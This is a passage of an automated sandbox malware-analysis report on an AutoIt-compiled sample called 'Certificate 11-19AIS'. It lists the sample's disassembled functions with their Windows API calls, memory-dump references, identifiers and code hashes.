                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007EC84A
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 007EC85D
                                                                              • GetCurrentThreadId.KERNEL32 ref: 007EC864
                                                                              • AttachThreadInput.USER32(00000000), ref: 007EC86B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 2710830443-0
                                                                              • Opcode ID: 70108fb4d450982277aa824254bfb983a809fb8801f55ecdc6d744ce00d1de28
                                                                              • Instruction ID: 6eb5e6ec0d7e1629a4cbb86dd00aa46fdd49b9808ef638198dfb1696bc63dd1e
                                                                              • Opcode Fuzzy Hash: 70108fb4d450982277aa824254bfb983a809fb8801f55ecdc6d744ce00d1de28
                                                                              • Instruction Fuzzy Hash: 93E03975142368BADB211BA2AC0EEDB7F2CEF5A7A1F008421B60984461D7B58581DBE0
                                                                              Function 007EB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThread.KERNEL32 ref: 007EB0D6
                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,007EAC9D), ref: 007EB0DD
                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007EAC9D), ref: 007EB0EA
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,007EAC9D), ref: 007EB0F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                              • String ID:
                                                                              • API String ID: 3974789173-0
                                                                              • Opcode ID: c2c2c889539da045a354be44ba63de1586b819e4ca805ea8053ed52d79e72215
                                                                              • Instruction ID: 39b2904e94705f80198d473b33e00bdd9354bd70f232609cb84154e7e8b0e48e
                                                                              • Opcode Fuzzy Hash: c2c2c889539da045a354be44ba63de1586b819e4ca805ea8053ed52d79e72215
                                                                              • Instruction Fuzzy Hash: FDE086327013119BD7201FB26D0CB4B3BACFF95B91F018C18F241D6040EB389401CB60
                                                                              Function 007CB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSysColor.USER32(00000008), ref: 007CB496
                                                                              • SetTextColor.GDI32(?,000000FF), ref: 007CB4A0
                                                                              • SetBkMode.GDI32(?,00000001), ref: 007CB4B5
                                                                              • GetStockObject.GDI32(00000005), ref: 007CB4BD
                                                                              • GetWindowDC.USER32(?,00000000), ref: 0082DE2B
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0082DE38
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0082DE51
                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0082DE6A
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0082DE8A
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0082DE95
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                              • String ID:
                                                                              • API String ID: 1946975507-0
                                                                              • Opcode ID: d7482d7758285fea69af749cb3607749b1dc95fdefbf88aab379d8a8fa58c3f4
                                                                              • Instruction ID: 13d92a629b625c4c0fbe11cbd3fc71a44a977f96f316aa037eba85098b5ada16
                                                                              • Opcode Fuzzy Hash: d7482d7758285fea69af749cb3607749b1dc95fdefbf88aab379d8a8fa58c3f4
                                                                              • Instruction Fuzzy Hash: 80E0ED31504380EBDB215B64BC09BDC7F21FB91335F14CA6AF669980E2C7714581DB11
                                                                              Function 0082B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: 4ea49a3189e872a0c0b0703bc02956be26aadef1ef72727cf8135b6686cce2b4
                                                                              • Instruction ID: 1bc170269357537238439d87ce2291ea675f446fc77c5e0d504f9c2c9dcca178
                                                                              • Opcode Fuzzy Hash: 4ea49a3189e872a0c0b0703bc02956be26aadef1ef72727cf8135b6686cce2b4
                                                                              • Instruction Fuzzy Hash: 67E04FB1100304EFDB005F70E84DA2D7BA9FB9C350F11CC19FC6A87211DB7998418B90
                                                                              Function 007EB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007EB2DF
                                                                              • UnloadUserProfile.USERENV(?,?), ref: 007EB2EB
                                                                              • CloseHandle.KERNEL32(?), ref: 007EB2F4
                                                                              • CloseHandle.KERNEL32(?), ref: 007EB2FC
                                                                                • Part of subcall function 007EAB24: GetProcessHeap.KERNEL32(00000000,?,007EA848), ref: 007EAB2B
                                                                                • Part of subcall function 007EAB24: HeapFree.KERNEL32(00000000), ref: 007EAB32
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                              • String ID:
                                                                              • API String ID: 146765662-0
                                                                              • Opcode ID: 51c32b6120dd65b6309ada83a8a188ba1136ecec74b6f9dfae030e6ed0866bf3
                                                                              • Instruction ID: dfa242eca8271ea053db544ef6d5e4f1d8d18d796e73fd2ffcbb790937a91966
                                                                              • Opcode Fuzzy Hash: 51c32b6120dd65b6309ada83a8a188ba1136ecec74b6f9dfae030e6ed0866bf3
                                                                              • Instruction Fuzzy Hash: BAE0BF36104105FBCB012B95EC08859FB76FFC83213108621F61581571DB32A871EB91
                                                                              Function 0082B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: 2a7b3170d2ecdcfc9efc1e91f4eb6792ff0894281b091c41ce66e472f2be52f1
                                                                              • Instruction ID: 1ff9d2d38603c789ea39901346b97a83ec2861f21f0e065bf866ceadf7b97216
                                                                              • Opcode Fuzzy Hash: 2a7b3170d2ecdcfc9efc1e91f4eb6792ff0894281b091c41ce66e472f2be52f1
                                                                              • Instruction Fuzzy Hash: 25E046B1500300EFDB005F70E84DA2D7BA9FB9C350F118C19F96E8B211EBB9A8018B90
                                                                              Function 007EDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 007EDEAA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ContainedObject
                                                                              • String ID: AutoIt3GUI$Container
                                                                              • API String ID: 3565006973-3941886329
                                                                              • Opcode ID: 8c430d86b81d81c1f430aca408b895c329ffac2f229d5429541b5f135a6785af
                                                                              • Instruction ID: f89a0626fd3ea22858e1e593dea8603d041308a05573b03fd2009c60f892d453
                                                                              • Opcode Fuzzy Hash: 8c430d86b81d81c1f430aca408b895c329ffac2f229d5429541b5f135a6785af
                                                                              • Instruction Fuzzy Hash: 5D912570601601AFDB24CF65C888F6AB7B9FF49710F10896EF95ACB291DB74E941CB60
                                                                              Function 007CBCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 007CBCDA
                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 007CBCF3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemorySleepStatus
                                                                              • String ID: @
                                                                              • API String ID: 2783356886-2766056989
                                                                              • Opcode ID: 98ff80ddf9fe4064c5788b54a88460d26cc48cd2fcacf3a4fdd5624bc0c7682f
                                                                              • Instruction ID: 14214436c9accaeb7aca97f5f44e7e3da2719233c00c04dcc21d77baa520256a
                                                                              • Opcode Fuzzy Hash: 98ff80ddf9fe4064c5788b54a88460d26cc48cd2fcacf3a4fdd5624bc0c7682f
                                                                              • Instruction Fuzzy Hash: 16513571408744DBE320AF14EC8AFAFBBE8FB94354F41484EF1C8410A2EF7495A98766
                                                                              Function 007FC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007B44ED: __fread_nolock.LIBCMT ref: 007B450B
                                                                              • _wcscmp.LIBCMT ref: 007FC65D
                                                                              • _wcscmp.LIBCMT ref: 007FC670
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscmp$__fread_nolock
                                                                              • String ID: FILE
                                                                              • API String ID: 4029003684-3121273764
                                                                              • Opcode ID: e80a1ed3e96aefdf9fe95856c19b4fa49b6ad6f206104b6f3e33423fb9c119a6
                                                                              • Instruction ID: a9460cb195bea9302dd28f145c2dc50519da688d43158ad0f203ab12135ac7f5
                                                                              • Opcode Fuzzy Hash: e80a1ed3e96aefdf9fe95856c19b4fa49b6ad6f206104b6f3e33423fb9c119a6
                                                                              • Instruction Fuzzy Hash: C441D472A0420EBBDF219BA4DC46FEF77B9EF49714F000069F605EB281D6789A14CB61
                                                                              Function 0081A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0081A85A
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0081A86F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: '
                                                                              • API String ID: 3850602802-1997036262
                                                                              • Opcode ID: 87499bbc16cdf7093e8ec99d1bfd7689e2ee613452c17f177c573dff983cfbfe
                                                                              • Instruction ID: a5fe05fb61ebb197839f5a7a3404a9dd1a0a02be3ca6b309d5c32a962f05d5f3
                                                                              • Opcode Fuzzy Hash: 87499bbc16cdf7093e8ec99d1bfd7689e2ee613452c17f177c573dff983cfbfe
                                                                              • Instruction Fuzzy Hash: 3741E974A013099FDB54CF68D885BDA7BB9FF08704F14046AE909EB385D770A981CF91
                                                                              Function 00805180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00805190
                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 008051C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CrackInternet_memset
                                                                              • String ID: |
                                                                              • API String ID: 1413715105-2343686810
                                                                              • Opcode ID: 4b008555a4d294b90a88aa4fde333f77468ff3de975d908565339e62eefa246b
                                                                              • Instruction ID: b0f224ee0745e60fa93a55ac7e66025d1f822ab5713bafea1da0b98dfe50f9bf
                                                                              • Opcode Fuzzy Hash: 4b008555a4d294b90a88aa4fde333f77468ff3de975d908565339e62eefa246b
                                                                              • Instruction Fuzzy Hash: 59312A71C01119EBCF41EFA4CC89AEE7FB9FF18714F104015F915AA166DB35A906DBA0
                                                                              Function 0081975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 0081980E
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0081984A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$DestroyMove
                                                                              • String ID: static
                                                                              • API String ID: 2139405536-2160076837
                                                                              • Opcode ID: f122b664b6cbbf0160bfc98126a7463fd2dbc2f26bf3fcf105c7393370b552d1
                                                                              • Instruction ID: 8d7086b70b22f3146f0734cdaec9432f920a5769db0741f68d41d6e6b193f88a
                                                                              • Opcode Fuzzy Hash: f122b664b6cbbf0160bfc98126a7463fd2dbc2f26bf3fcf105c7393370b552d1
                                                                              • Instruction Fuzzy Hash: D8318A71110604AEEB109F28CC95BFB73ADFF99764F008629F8A9C7190DA34AC81C7A0
                                                                              Function 007F5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007F51C6
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F5201
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: 4ef593409e9ae6116f6b8b6e2bab752b089cd30512e0efc7b666a00b76b84080
                                                                              • Instruction ID: 1c44d58eb836fe90a6284950c9eb8fbefea6790120fc383fad32c02b3dee367d
                                                                              • Opcode Fuzzy Hash: 4ef593409e9ae6116f6b8b6e2bab752b089cd30512e0efc7b666a00b76b84080
                                                                              • Instruction Fuzzy Hash: 8631C37160070CDBEB24CF99D849BBEBBB5FF45350F144119EB85A62A0D7789A44CB50
                                                                              Function 0080658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __snwprintf
                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                              • API String ID: 2391506597-2584243854
                                                                              • Opcode ID: 0259b821a2a8fab9dc44e7dc80682c7379cf069a8922943fa247b096196d603a
                                                                              • Instruction ID: fd73c001a937e461c19d080a2b01f0c328b408f0314aed94e64f3b5c54a9c52f
                                                                              • Opcode Fuzzy Hash: 0259b821a2a8fab9dc44e7dc80682c7379cf069a8922943fa247b096196d603a
                                                                              • Instruction Fuzzy Hash: 4D218971600218EBCF10EFA4CC86BEE73B4FF59300F000459F015EB281EA39EA258BA1
                                                                              Function 008193CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0081945C
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00819467
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Combobox
                                                                              • API String ID: 3850602802-2096851135
                                                                              • Opcode ID: 69c0c256ba01f51fd3953eb28f4c37c2b602e5a8722730aa3113ae0c9bc593e4
                                                                              • Instruction ID: 3c3309ec8c99a7b4d858e572fcd9cfd19c11980f2d390f01fad0ff80b12928a2
                                                                              • Opcode Fuzzy Hash: 69c0c256ba01f51fd3953eb28f4c37c2b602e5a8722730aa3113ae0c9bc593e4
                                                                              • Instruction Fuzzy Hash: 2A1190B1200208AFEF259E58DC90EEB376EFF983A4F110129F959D7290D6319C928764
                                                                              Function 008198FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007CD1BA
                                                                                • Part of subcall function 007CD17C: GetStockObject.GDI32(00000011), ref: 007CD1CE
                                                                                • Part of subcall function 007CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 007CD1D8
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00819968
                                                                              • GetSysColor.USER32(00000012), ref: 00819982
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                              • String ID: static
                                                                              • API String ID: 1983116058-2160076837
                                                                              • Opcode ID: e6c050df152d34da3cec367f1afcbdba75a6b9626dd864d4e23ce5819980c7d7
                                                                              • Instruction ID: 8da967200e29dca75ea4d3cec1d8adda00cc73288bd42559b525bef36646a10c
                                                                              • Opcode Fuzzy Hash: e6c050df152d34da3cec367f1afcbdba75a6b9626dd864d4e23ce5819980c7d7
                                                                              • Instruction Fuzzy Hash: BF112972510209AFDB04DFB8CC45EEA7BA8FF48344F054629F996D3250E734E850DB60
                                                                              Function 00819617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00819699
